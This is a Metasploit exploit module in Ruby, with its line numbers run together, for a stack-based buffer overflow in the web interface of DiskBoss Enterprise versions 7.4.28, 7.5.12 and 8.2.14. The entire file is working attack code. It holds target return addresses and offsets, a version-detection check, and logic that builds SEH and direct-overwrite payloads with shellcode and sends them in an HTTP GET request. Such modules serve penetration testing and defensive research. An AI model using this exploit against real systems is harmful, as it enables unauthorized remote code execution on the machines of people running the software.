Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Seh9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'DiskBoss Enterprise GET Buffer Overflow',16'Description' => %q{17This module exploits a stack-based buffer overflow vulnerability18in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,19caused by improper bounds checking of the request path in HTTP GET20requests sent to the built-in web server. This module has been21tested successfully on Windows XP SP3 and Windows 7 SP1.22},23'License' => MSF_LICENSE,24'Author' => [25'vportal', # Vulnerability discovery and PoC26'Ahmad Mahfouz', # Vulnerability discovery and PoC27'Gabor Seljan', # Metasploit module28'Jacob Robles' # Metasploit module29],30'References' => [31['EDB', '40869'],32['EDB', '42395']33],34'DefaultOptions' => {35'EXITFUNC' => 'thread'36},37'Platform' => 'win',38'Payload' => {39'BadChars' => "\x00\x09\x0a\x0d\x20",40'Space' => 200041},42'Targets' => [43[44'Automatic Targeting',45{46'auto' => true47}48],49[50'DiskBoss Enterprise v7.4.28',51{52'Offset' => 2471,53'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]54}55],56[57'DiskBoss Enterprise v7.5.12',58{59'Offset' => 2471,60'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]61}62],63[64'DiskBoss Enterprise v8.2.14',65{66'Offset' => 2496,67'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]68}69]70],71'Privileged' => true,72'DisclosureDate' => '2016-12-05',73'DefaultTarget' => 0,74'Notes' => {75'Reliability' => UNKNOWN_RELIABILITY,76'Stability' => UNKNOWN_STABILITY,77'SideEffects' => UNKNOWN_SIDE_EFFECTS78}79)80)81end8283def check84res = send_request_cgi(85'method' => 'GET',86'uri' => '/'87)8889if res && res.code == 20090if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/91return Exploit::CheckCode::Vulnerable92elsif res.body =~ /DiskBoss Enterprise/93return Exploit::CheckCode::Detected94end95else96vprint_error('Unable to determine due to a HTTP connection timeout')97return Exploit::CheckCode::Unknown98end99100Exploit::CheckCode::Safe101end102103def exploit104mytarget = target105106if target['auto']107mytarget = nil108109print_status('Automatically detecting the target...')110111res = send_request_cgi(112'method' => 'GET',113'uri' => '/'114)115116if res && res.code == 200117if res.body =~ /DiskBoss Enterprise v7\.4\.28/118mytarget = targets[1]119elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/120mytarget = targets[2]121elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/122mytarget = targets[3]123end124end125126if !mytarget127fail_with(Failure::NoTarget, 'No matching target')128end129130print_status("Selected Target: #{mytarget.name}")131end132133case mytarget134when targets[1], targets[2]135sploit = make_nops(21)136sploit << payload.encoded137sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)138sploit << [mytarget.ret].pack('V')139sploit << rand_text_alpha(2500)140when targets[3]141seh = generate_seh_record(mytarget.ret)142sploit = payload.encoded143sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)144sploit[sploit.length, seh.length] = seh145sploit << make_nops(10)146sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode147sploit << rand_text_alpha(5000 - sploit.length)148else149fail_with(Failure::NoTarget, 'No matching target')150end151152send_request_cgi(153'method' => 'GET',154'uri' => sploit155)156end157end158159160